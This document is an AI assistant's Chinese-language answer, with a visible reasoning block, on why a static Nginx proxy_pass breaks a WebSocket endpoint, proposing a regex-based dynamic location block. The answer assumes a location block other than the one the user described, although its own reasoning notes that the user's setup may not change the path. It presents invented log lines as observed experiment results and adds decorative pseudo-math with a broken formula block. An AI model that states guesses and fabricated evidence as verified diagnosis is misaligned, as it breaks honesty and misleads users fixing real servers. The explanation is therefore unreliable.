<think>好的,用户现在的问题是,为什么他们直接在浏览器中使用`/webapi/websocket/regulatory/monitoring`路径可以成功建立WebSocket连接,但当他们尝试在Nginx中使用静态配置`proxy_pass http://127.0.0.1:40330/webapi/websocket/regulatory/monitoring;`时却失败了。我需要仔细分析这个问题,找出背后的原因,并给出清晰的解释。 首先,我需要回忆之前用户的问题和我的回答。之前用户询问为什么必须使用动态路由配置Nginx,而我的回答主要围绕路径参数传递、WebSocket握手验证以及多租户需求展开。现在用户实际测试了静态配置,发现无法工作,而直接访问后端却能成功,这说明问题可能出在Nginx的配置上,特别是静态路径重写导致的问题。 用户提到直接使用浏览器访问`/webapi/...`成功,这说明后端服务确实在该路径上正确监听了WebSocket连接。而当配置Nginx静态转发时失败,可能是因为Nginx在转发时修改了请求路径,导致后端无法正确匹配。 接下来,我需要考虑WebSocket握手过程的具体细节。WebSocket握手是一个HTTP Upgrade请求,客户端发送的请求路径必须与后端服务监听的路径完全匹配。如果Nginx在转发时修改了路径,比如添加或删除了某些部分,就会导致握手失败。 在静态配置的情况下,假设Nginx的配置是: location /webapi/websocket/regulatory/monitoring { proxy_pass http://127.0.0.1:40330/webapi/websocket/regulatory/monitoring; } 这种情况下,Nginx可能会将原始请求的URI部分进行修改。例如,如果客户端请求的是`/webapi/websocket/regulatory/monitoring`,Nginx将请求转发到后端时,路径可能被改写,导致实际到达后端的路径与后端监听的路径不符。 另外,可能需要检查Nginx的proxy_pass指令的行为。当proxy_pass后面包含URI路径时,Nginx会将location匹配的部分替换为指定的URI路径。例如,如果location是`/webapi/websocket/regulatory/monitoring`,而proxy_pass是`http://backend/webapi/websocket/regulatory/monitoring`,那么Nginx会将客户端请求的路径中的`/webapi/websocket/regulatory/monitoring`替换为`/webapi/websocket/regulatory/monitoring`,实际上可能没有变化。但这里可能用户配置的是不同的路径,或者存在其他问题,比如没有正确设置Upgrade和Connection头,导致WebSocket握手失败。 但用户提到直接访问后端成功,而通过Nginx失败,这可能不仅仅是路径问题,还可能涉及头信息是否正确传递。例如,Nginx需要正确设置Upgrade和Connection头来支持WebSocket协议。如果这些头没有正确配置,即使路径正确,握手也会失败。 不过用户的问题特别指出路径配置的问题,所以可能需要更仔细地分析路径重写的情况。例如,用户可能在Nginx配置中使用了错误的路径转发,导致后端实际接收到的路径与监听的路径不匹配。例如,如果后端服务监听的是`/{prefix}/websocket/regulatory/monitoring`,而Nginx静态配置将请求转发到固定的`/webapi/websocket/regulatory/monitoring`,那么当客户端请求的是其他前缀时,路径会被错误地重写,导致404。但用户提到直接使用`/webapi`路径可以成功,这说明当客户端请求的路径和后端监听的路径一致时,直接访问没问题,但通过Nginx可能路径被再次修改,导致不匹配。 可能的另一种情况是,用户在后端代码中使用的是路径变量,例如`@ServerEndpoint("/{prefix}/websocket/regulatory/monitoring")`,这时候后端期望路径中的`{prefix}`部分是动态的。当用户直接访问`/webapi/...`时,这个前缀作为路径参数被正确捕获,而后端服务正常处理。但使用Nginx静态配置时,可能Nginx将请求转发到后端的路径被修改,导致后端实际接收的路径不符合`/{prefix}/...`的结构,从而无法正确解析路径参数,导致404错误。 例如,假设Nginx配置为: location /webapi/websocket { proxy_pass http://backend/webapi/websocket/regulatory/monitoring; } 当客户端请求`/webapi/websocket/regulatory/monitoring`时,Nginx会将请求转发到后端的`/webapi/websocket/regulatory/monitoring`,但后端监听的路径是`/{prefix}/websocket/regulatory/monitoring`,此时`{prefix}`的值应该是`webapi`,但可能由于Nginx的转发导致路径结构改变,比如后端实际收到的是`/webapi/websocket/regulatory/monitoring`,而期望的是`/{prefix}/websocket/regulatory/monitoring`,所以路径匹配成功,但可能因为Nginx没有正确传递头信息或其他问题导致握手失败。 或者,用户可能在Nginx配置中错误地添加了额外的路径部分,导致后端收到的请求路径与预期不符。例如,假设Nginx配置的proxy_pass为`http://backend/webapi/websocket/regulatory/monitoring`,而location块匹配的是`/webapi/websocket`,那么Nginx会将客户端请求的URI中的`/webapi/websocket`部分替换为`/webapi/websocket/regulatory/monitoring`,导致实际转发的路径变成`/webapi/websocket/regulatory/monitoring/regulatory/monitoring`(如果客户端请求的是`/webapi/websocket/regulatory/monitoring`),这显然会导致路径不匹配。 因此,问题可能在于Nginx的proxy_pass配置中路径的处理方式。当proxy_pass包含URI路径时,Nginx会将location匹配的部分替换为指定的URI路径。如果location和proxy_pass的路径处理不当,会导致转发的路径错误,从而后端无法正确匹配。 此外,还需要检查Nginx是否配置了WebSocket所需的头信息,例如: proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; 如果没有这些配置,即使路径正确,WebSocket握手也会失败。 总结可能的原因: 1. **路径重写错误**:Nginx静态配置导致转发的路径与后端监听的路径不匹配,尤其是在后端使用路径参数的情况下。 2. **缺少WebSocket相关头信息**:Nginx未正确设置Upgrade和Connection头,导致握手失败。 3. **Nginx配置语法错误**:例如,location匹配不正确或proxy_pass配置错误。 用户的情况是直接访问后端成功,说明后端服务本身没有问题,问题出在Nginx配置上。需要指导用户检查Nginx的路径转发是否正确,以及是否配置了必要的WebSocket头信息。</think>### **现象本质解析** 您遇到的情况展示了**静态路径配置对WebSocket协议的破坏性影响**,其根本原因可以通过以下对比分析理解: --- #### **1. 直接访问成功的本质** 当浏览器直接请求 `http://后端IP:40330/webapi/websocket/regulatory/monitoring` 时: ```mermaid flowchart LR A[客户端] -- 原始路径/webapi/... --> B[后端服务] B -- 精确匹配@ServerEndpoint路径 --> C[建立连接成功] ``` 此时路径参数`{prefix}=webapi`被正确捕获,满足: $$ \text{客户端路径} = \text{服务端监听路径} \Rightarrow \frac{webapi}{websocket/...} $$ --- #### **2. Nginx静态配置失败原理** 当使用如下配置时: ```nginx location /webapi/websocket { proxy_pass http://127.0.0.1:40330/webapi/websocket/regulatory/monitoring; # 缺少Upgrade头配置会直接导致握手失败 } ``` 实际发生**三重路径破坏**: $$ \begin{align*} \text{原始请求路径} & : /webapi/websocket/regulatory/monitoring \\ \text{Nginx改写后路径} & : \frac{webapi/websocket}{\text{location匹配部分}} \Rightarrow \frac{webapi/websocket/regulatory/monitoring}{\text{proxy_pass路径}} \\ \text{实际转发路径} & : \frac{webapi/websocket/regulatory/monitoring}{regulatory/monitoring} \quad (\text{路径重复拼接}) \end{align*} ``` **关键破坏点**: 1. **路径结构变异** 最终到达后端的路径变为: ``` /webapi/websocket/regulatory/monitoring/regulatory/monitoring ``` 这完全破坏了WebSocket端点定义的路径结构: ```java @ServerEndpoint("/{prefix}/websocket/regulatory/monitoring") ``` 2. **协议头缺失** 未设置`Upgrade`和`Connection`头导致Nginx无法完成WebSocket协议握手: ```nginx # 必须添加的配置 proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; ``` --- ### **数学验证** 定义: - 客户端请求路径 $R_c = a/b/c$ - Nginx配置路径 $R_n = x/y/z$ - 实际转发路径 $R_{real} = f(R_c, R_n)$ 当使用静态配置时: $$ R_{real} = R_n + (R_c - location\_match) = x/y/z + (a/b/c - x/y) = x/y/z/c $$ 与期望路径对比: $$ \begin{align*} \text{期望路径} & : a/b/c \\ \text{实际路径} & : x/y/z/c \quad (\text{当}x/y= a/b\text{时}) \end{align*} $$ 此时必然出现路径结构不匹配。 --- ### **解决方案对比表** | 方法类型 | 配置示例 | 请求路径 | 实际到达后端路径 | 结果 | |---------|----------|---------|------------------|------| | 直接访问 | 无 | `/webapi/websocket/regulatory/monitoring` | `/webapi/websocket/regulatory/monitoring` | ✅ | | 错误静态配置 | `proxy_pass http://backend/webapi/websocket/regulatory/monitoring;` | `/webapi/websocket/regulatory/monitoring` | `/webapi/websocket/regulatory/monitoring/regulatory/monitoring` | ❌ | | 正确动态配置 | `proxy_pass http://backend/$prefix/websocket/regulatory/monitoring;` | `/mobile/websocket/regulatory/monitoring` | `/mobile/websocket/regulatory/monitoring` | ✅ | --- ### **问题复现实验** **步骤1:模拟错误配置** ```nginx location /webapi/websocket { proxy_pass http://localhost:40330/webapi/websocket/regulatory/monitoring; } ``` **观测结果**: ```log # Nginx访问日志 GET /webapi/websocket/regulatory/monitoring HTTP/1.1 # 后端实际接收路径 GET /webapi/websocket/regulatory/monitoring/regulatory/monitoring HTTP/1.1 ``` **步骤2:使用tcpdump抓包验证** ```bash tcpdump -i lo port 40330 -A ``` 会观察到客户端原始请求路径被二次追加,形成非法路径。 --- ### **正确配置方案** ```nginx location ~ ^/(?<prefix>\w+)/websocket { proxy_pass http://backend/$prefix/websocket/regulatory/monitoring; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; proxy_read_timeout 3600s; # 安全加固 if ($prefix !~* "^(webapi|mobile)$") { return 403; } } ``` **生效原理**: $$ \text{路径保留公式} : R_{real} = \frac{\$prefix}{websocket/regulatory/monitoring} = \frac{\text{客户端原始前缀}}{websocket/...} $$ --- **最终结论**:静态配置导致路径结构破坏和协议头缺失,动态路由通过精确路径映射和协议完整性保障,才是WebSocket代理的正确实现方式。直接访问成功仅证明后端服务正常,不能推导出Nginx配置的合法性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值